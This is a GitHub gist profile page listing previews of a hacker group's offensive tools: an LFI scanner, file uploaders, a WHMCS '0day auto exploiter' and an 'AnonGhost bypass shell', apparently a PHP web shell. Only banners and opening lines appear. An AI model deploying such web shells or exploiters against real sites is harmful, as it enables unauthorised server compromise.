Skip to content

Instantly share code, notes, and snippets.

View Kaizen1337's full-sized avatar

Zaenal Arifin Kaizen1337

View GitHub Profile
@Kaizen1337
Kaizen1337 / LFI.pl
Last active May 22, 2019 05:11
LocalFile
#!/usr/bin/perl
use HTTP::Request;
use LWP::UserAgent;
system("title The JavaHaxor Group");
system("color 1e");
system ("cls");
print " |=======================================================|\n";
print " |= _ ______ _____ =|\n";
print " |= | | | ____|_ _| =|\n";
@Kaizen1337
Kaizen1337 / PHP
Last active March 5, 2018 02:05
Xai Uploader
<html>
<head>
<title>Xai Syndicate Uploader !</title>
<meta name="keywords" content="Kaizen Uploader,Xai syndicate uploader,xai syndicate,xai,kaizen">
<meta name="description" content="Xai Syndicate Uploader">
<meta name="rating" content="General">
<meta name="revisit-after" content="1 days">
<meta name="classification" content="Author by Kaizen">
<meta name="robots schedule" content="auto">
<style type='text/css'>
@Kaizen1337
Kaizen1337 / PHP
Created February 26, 2018 04:00
Whmcs 0day Auto Exploiter - 5.2.8 b
<?php
set_time_limit(0);
ini_set('memory_limit', '64M');
header('Content-Type: text/html; charset=UTF-8');
function letItBy(){ ob_flush(); flush(); }
function getAlexa($url)
{
$xml = simplexml_load_file('http://data.alexa.com/data?cli=10&dat=snbamz&url='.$url);
$rank1 = $xml->SD[1];
@Kaizen1337
Kaizen1337 / PHP
Created February 26, 2018 03:54
Local File Inclusion LFI Scanner Perl V.1.0 CyBeRiZM
#!/usr/bin/perl
#1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
#0 _ __ __ __ 1
#1 /' \ __ /'__`\ /\ \__ /'__`\ 0
#0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
#1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
#0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
#1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
#0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
#1 \ \____/ >> Exploit database separated by exploit 0
@Kaizen1337
Kaizen1337 / PHP
Created February 22, 2018 01:18
AnonGhost Bypass Shell 2014
<?php
session_start();
error_reporting(E_ERROR | E_PARSE);
@ini_set("max_execution_time",0);
@set_time_limit(0); #No Fx in SafeMode
@ignore_user_abort(TRUE);
@set_magic_quotes_runtime(0);
// global configs
@Kaizen1337
Kaizen1337 / PHP
Created February 22, 2018 01:18
AnonGhost Bypass Shell 2014
<?php
session_start();
error_reporting(E_ERROR | E_PARSE);
@ini_set("max_execution_time",0);
@set_time_limit(0); #No Fx in SafeMode
@ignore_user_abort(TRUE);
@set_magic_quotes_runtime(0);
// global configs
@Kaizen1337
Kaizen1337 / PHP
Last active July 12, 2018 19:51
Bypass Uplader Script
<html>
<head>
<title>AnonGhost Team</title>
<style type='text/css'>
@import url(https://fonts.googleapis.com/css?family=Ubuntu);
html {
background: #000000;
color: #ffffff;
font-family: 'Ubuntu';
font-size: 13px;